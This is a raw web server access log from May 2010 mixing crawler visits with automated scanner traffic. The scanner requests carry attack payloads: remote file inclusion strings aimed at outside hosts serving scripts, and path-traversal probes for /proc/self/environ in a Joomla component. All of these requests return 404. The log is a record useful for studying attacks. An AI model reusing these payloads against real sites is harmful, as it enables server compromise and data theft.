87.250.255.243 - - [08/May/2010:17:47:13 -0500] "GET /logs/access_log.1201392000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.189.224.16 - - [08/May/2010:17:48:28 -0500] "GET /logs/http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 357 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
213.189.224.16 - - [08/May/2010:17:48:28 -0500] "GET /http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 352 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
213.189.224.16 - - [08/May/2010:17:48:28 -0500] "GET /includes/class_item.php?fileExtension=http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
213.189.224.16 - - [08/May/2010:17:48:28 -0500] "GET /logs/includes/class_item.php?fileExtension=http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.250.255.243 - - [08/May/2010:17:52:58 -0500] "GET /logs/access_log.1249689600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:18:00:17 -0500] "GET /logs/access_log.1269561600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.181.34 - - [08/May/2010:18:03:00 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [08/May/2010:18:03:16 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.22.246.6 - - [08/May/2010:18:03:42 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.59.147.177 - - [08/May/2010:18:03:45 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.13.101 - - [08/May/2010:18:04:50 -0500] "GET /logs/access_log.1207094400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:18:07:36 -0500] "GET /logs/access_log.1201910400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.85 - - [08/May/2010:18:13:51 -0500] "GET /logs/access_log.1168992000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:18:14:54 -0500] "GET /logs/access_log.1220486400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.43 - - [08/May/2010:18:15:56 -0500] "GET /artwork/postcards.htm HTTP/1.1" 200 690 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.127.70.140 - - [08/May/2010:18:16:56 -0500] "GET /logs/access_log.1272067200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
216.127.70.140 - - [08/May/2010:18:16:56 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
216.127.70.140 - - [08/May/2010:18:16:57 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
67.218.116.130 - - [08/May/2010:18:18:12 -0500] "GET /logs/access_log.1254960000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.127.70.140 - - [08/May/2010:18:19:27 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
213.189.224.16 - - [08/May/2010:18:20:23 -0500] "GET /includes/class_item.php?fileExtension=http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
81.22.246.6 - - [08/May/2010:18:20:40 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.22.246.6 - - [08/May/2010:18:20:40 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.53.154.162 - - [08/May/2010:18:20:47 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
178.63.9.215 - - [08/May/2010:18:21:41 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
87.250.255.243 - - [08/May/2010:18:23:14 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.189.224.16 - - [08/May/2010:18:24:21 -0500] "GET /logs/includes/class_item.php?fileExtension=http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
91.121.181.34 - - [08/May/2010:18:25:09 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.181.34 - - [08/May/2010:18:25:10 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.181.34 - - [08/May/2010:18:25:10 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.46.13.101 - - [08/May/2010:18:28:50 -0500] "GET /logs/access_log.1267315200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.229 - - [08/May/2010:18:29:50 -0500] "GET /logs/access_log.1220572800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.20.123 - - [08/May/2010:18:30:19 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.20.123 - - [08/May/2010:18:30:19 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [08/May/2010:18:30:19 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
209.59.147.177 - - [08/May/2010:18:30:32 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
209.59.147.177 - - [08/May/2010:18:30:33 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
209.59.147.177 - - [08/May/2010:18:30:33 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
87.250.255.243 - - [08/May/2010:18:31:35 -0500] "GET /logs/access_log.1238889600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.22.246.6 - - [08/May/2010:18:32:08 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.22.246.6 - - [08/May/2010:18:32:09 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.22.246.6 - - [08/May/2010:18:32:09 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.178.217.28 - - [08/May/2010:18:32:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""betaBot"
62.178.217.28 - - [08/May/2010:18:32:28 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""betaBot"
74.53.154.162 - - [08/May/2010:18:38:10 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.53.154.162 - - [08/May/2010:18:38:10 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.53.154.162 - - [08/May/2010:18:38:11 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
87.250.255.243 - - [08/May/2010:18:38:53 -0500] "GET /logs/access_log.1242777600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.86 - - [08/May/2010:18:41:20 -0500] "GET /logs/access_log.1191369600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.22.246.6 - - [08/May/2010:18:41:25 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.22.246.6 - - [08/May/2010:18:41:25 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.22.246.6 - - [08/May/2010:18:41:26 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.22.246.6 - - [08/May/2010:18:41:37 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.22.246.6 - - [08/May/2010:18:41:37 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.22.246.6 - - [08/May/2010:18:41:37 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [08/May/2010:18:47:13 -0500] "GET /logs/access_log.1172793600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
178.63.9.215 - - [08/May/2010:18:47:53 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.63.9.215 - - [08/May/2010:18:47:53 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.63.9.215 - - [08/May/2010:18:47:54 -0500] "GET /logs/index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
87.250.255.243 - - [08/May/2010:18:53:28 -0500] "GET /logs/access_log.1219622400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:18:59:45 -0500] "GET /logs/access_log.1245456000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"